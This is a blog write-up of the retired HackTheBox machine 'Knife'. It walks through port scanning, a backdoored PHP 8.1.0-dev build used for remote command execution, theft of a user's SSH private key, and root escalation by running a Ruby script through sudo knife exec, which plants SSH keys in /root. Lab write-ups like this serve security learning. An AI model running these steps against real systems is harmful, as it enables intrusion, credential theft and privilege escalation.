HTB: Knife

Posted on 29 Aug 2021 in security • 3 min read

Knife card

This is a writeup about a retired HacktheBox machine: Knife published on May 22 2021 by MrKN16H This box is classified as an easy machine. This box implies a PHP dev backdoor and a misconfigured sudo permission for knife a chef utility.



We start with an nmap scan. Only port 22 (SSH) and port 80 (HTTP) are open.

# Nmap 7.91 scan initiated Tue May 25 12:12:19 2021 as: nmap -sSV -p- -A -oN
Nmap scan report for
Host is up (0.012s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea


On the port 80 there is a simple website with no real content. Running nikto on it show that the PHP version used is 8.1.0-dev.

└─$ nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2021-05-25 12:15:53 (GMT-4)
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

This specific 8.1.0-dev PHP version is vulnerable to a backdoor RCE

Using the exploit script we can directly execute command on the system. A few enumeration show that we are running command as james and we can grab his SSH private key.

└─$ python3 -u -c 'cat /home/james/.ssh/id_rsa' > id_rsa

A quick edit allows us remove the "result" from the python script then we use chmod 600 to fix the SSH key right and avoid the permission warning. Then we add the key to the authorized_keys file still using the PHP backdoor.

└─$ python3 -u -c 'cat /home/james/.ssh/ > /home/james/.ssh/authorized_keys'

We can then connect as james on the box and grab the user flag.

└─$ ssh james@ -i id_rsa
james@knife:~$ cat user.txt


We look at our permission on the box and found that we can run /usr/bin/knife on the box. This is a symlink to a ruby script used by chef.

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Look at the Knife documentation we found that knife exec can execute ruby scripts. We execute the id command to validate that we are running as root and then create the .ssh folder and add james' SSH key to the authorized_keys.

james@knife:~$ cat h.rb
puts "Hello World"
system "id"
system "mkdir -p /root/.ssh/"
system "cp /home/james/.ssh/authorized_keys /root/.ssh/"

james@knife:~$ sudo /usr/bin/knife exec h.rb -VVV
Hello World
uid=0(root) gid=0(root) groups=0(root)

We can then connect as root on the box (either from our kali or directly from the box) and grab the root flag.

└─$ ssh root@ -i id_rsa
root@knife:~# cat root.txt

Wrapping up

A really easy box perfect for new comers.